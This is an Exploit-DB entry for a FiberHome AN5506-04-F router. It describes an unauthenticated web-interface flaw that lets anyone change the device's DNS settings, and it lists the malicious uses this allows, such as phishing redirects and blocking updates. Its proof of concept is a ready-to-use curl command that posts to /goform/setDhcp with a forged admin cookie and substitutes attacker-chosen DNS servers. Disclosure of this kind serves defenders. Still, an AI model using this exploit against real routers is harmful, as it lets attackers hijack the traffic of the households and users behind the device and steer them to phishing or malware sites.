FiberHome AN5506 - Unauthenticated Remote DNS Change

EDB-ID: 43961
Author: r0ots3c
Published: 2018-02-02
CVE: N/A
Type: Webapps
Platform: Hardware
Vulnerable App: N/A

 # 
# Software Version RP2617
# Device Model AN5506-04-F
# Vendor Homepage: www.fiberhome.com/
#
#
# Date: 01/02/2018
# Exploit Author: r0ots3c
# http://wandoelmo.com.br
# https://www.facebook.com/wsec.info
#
# Description:
# Vulnerability exists in web interface
# This router has vulnerabilities where you can get information or edit
configurations in an unauthenticated way.
# The biggest risk is the possibility of changing the dns of the device.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
#

Proof of Concept:

VIA CURL:
curl 'http://<TARGET>/goform/setDhcp' -H 'Cookie: loginName=admin' -H
--data
'dhcpType=1&dhcprelay_ip=&dhcpStart=192.168.1.2&dhcpEnd=192.168.1.254&dhcpMask=255.255.255.0&dhcpPriDns=<MALICIOUS
DNS1>dhcpSecDns=<MALICIOUS
DNS2>&dhcpGateway=192.168.1.1&dhcptime=24&dhcptime_m=0&option_60enable_s=0&option_125enable_s=0&option125_text='
--compressed -k -i

Related Posts